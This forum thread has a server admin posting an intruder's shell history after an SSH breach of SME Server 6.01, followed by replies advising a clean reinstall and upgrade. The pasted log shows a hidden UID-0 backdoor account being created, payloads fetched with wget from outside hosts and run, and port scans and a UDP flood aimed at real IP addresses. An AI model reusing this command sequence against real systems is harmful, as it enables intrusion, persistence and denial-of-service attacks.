Topic: Security breach!

[mindea]

It looks like my server security was breached. I think due to a lazy password for an SSH login. But once in, I don't know how they managed to change the admin password, which was very secure. The root password was not changed. I'm curious as to what they were up to. Below is some of the command history.

$ /usr/sbin/useradd -u -0 -o -g -0 gepe

later, this appears

   42  lynx www.cservice.undernet.org/live
   43  w
   44  ps x
   45  cd .gepe
   46  mkdir .gepe
   47  cd .gepe
   48  wget bnc-irc.trei.ro/linux/psybnc.tar.gz
   49  tar xzvf psybnc.tar.gz
   50  cd psybnc
   51  make
   52  cd -
   53  wget http://whynot.saveitfree.com/linux.tgz
   54  w
   55  cd .gepe
   56  ls
   57  wget http://iasi-hack.sufx.net/strobe.zip
   58  tar xzvf strobe.zip
   59  cd strobe
   60  ./strobe 85.204.247.250
   61  ./strobe 89.108.81.36
   62  ./strobe 194.84.153.50
   63  ./strobe 195.199.197.243
   64  ./strobe 81.183.216.57
   65  w
   66  ps x
   67  cd .gepe
   68  ls
   69  cd psybnc
   70  ./psybnc
   71  ls
   72  make
   73  cd -
   74  wget http://whynot.saveitfree.com/linux.tgz
   75  tar xzvf linux.tgz
   76  cd vlad/
   77  ./bash
   78  cd .gepe
   79  cd strobe
   80  ./strobe 217.10.221.145
   81  w
   82  ls
   83  cd .gepe
   84  ls
   85  cd strobe
   86  ./strobe 217.10.195.146
   87  ./strobe 217.10.199.254
   88  w
   89  ls
   90  cd .gepe
   91  ls
   92  wget http://cutitas.uv.ro/udp.tgz
   93  tar xzvf udp.tgz
   94  perl udp.pl 80.17.241.75 0 0
   95  cd .gepe
   96  ls
   97  cd eplo
   98  cd exploituri/
   99  ./p
  100  ls
  101  ./p
  102  ./I
  103  id
  104  ls
  105  cd -
  106  ls
  107  cd
  108  ls
  109  cd .gepe
  110  uname -a
  111  wget help-bnc.octopis.com/do.tgz
  112  tar xzvf do.tgz
  113  ls
  114  ./do

Then I looked in the mail directory. There is no entry for "gepe", but the root entry looked like this:

-rw-rw----    1 root     root            0 Mar 22 02:19 gepe

I have now set my hardware firewall (Sonicwall) to not allow any inbound or outbound traffic from the server. I'd like to avoid having to reinstall if I can figure out how to undo/disable whatever they may have installed. Plus, I'll reset all the passwords to a higher lever and put very strict port rules on the firewall.

Any comments would be greatly appreciated. (The server is SME 6.01)

Thanks!

[Confucius]

ANY COMMENT(s)...

Ehmm.. what about upgrading ? and since you are suffering from a hack I would suggest a clean install.

I have been somewhere in 2005 busy with some patches for the 6.x because there were a lot of uncertain safety issues. I guess u missed that.
Evn tho I had all patches they managed to breach the security of 1 server unde rmy control by using a backdoor in awstats. No matter what you do. Don't rely on safety too easy. Keeping things updated is the best you can do and praying that they are not interested in trying to get in your server because we might be called experts by the people around us. There is always a "better" person.

Learn from it and move on to higher grounds (SME 7)


my 2 cents

Harro

[bpivk]

Now you know why you should upgrade your server to 7.1. Didn't you read the forum posts. SME 6 is not maintained anymore and you can thank yourself if you get hacked.

I would suggest that you format your server and install 7.1.2 with the latest updates+implement a ssh with public/private keys or disable it if you don't need it.

Don't bother with removing what they did. Install the newest SME version and patches and you're set. If you just fix what they did they can hack you again like they did. Having an obsolete server is never a god idea.

[byte]

Please do NOT report security breaches on the forum. Please read before you post and you would have seen...

"Don't report security issues here - Contact security at contribs dot org"

I know this is SME Server 6 and obsolete but as a general rule please never report a security breach on a public forum.

[beakersloco]

Let me be the 2nd to say backup any important data and reload but not for the same reason given previously.

I say reload because even though you can see logs of what he did you still can never be certain that he did not remove any log files. So even if you simply remove what you see he did your machine thier could still be other files the can allow him to reenter your machine. He could have simply removed/truncated the log so you could only see what he wanted you to see so cut you losses and reload.

If possible you might as well take the opportunity to upgrade to the lastest version. I just have a drive problem with my 6.1 server a few days ago and in a week or 2 after I decide on what hard drive/storage options I will be upgrading to 7.1.  


For people who simply see someone with an old non supported version of the software and say that  he needs to upgrade .. if you dont work in the IT field then you probaly dont realize that its not always that easy. While as stated knowing of the security risks it is the admins own fault he got hacked sometimes one can lose functionality when upgrading so people will wait before upgrading.  This is the reason I normally stay a version behind to give the sme community time to get some of the custom contribs I like to have working with the latest version.   A company a friend works for recently decided at the last minute not to perform an software upgrade because the new version did not include some of the same features the old software has that his company uses.

Last but not least his hardware might not be capable of supporting the latest version or might run like crap as I recently found when I had to replace my production system with my slower test system. Version 7.2 really kicks the crap out of a 600 mhz with 128 mb ram when in the past this system worked great for what I needed.

[bpivk]

Sme 7 is at 7.1.3 version so this is not just one version behind but at least 3-4 versions and is not a good thing to do. Yes there can be problems but i always update when people don't need the server (at night 01:00) and it does the trick.

Not to mention that opening SSH without custom certificates if always a bad idea.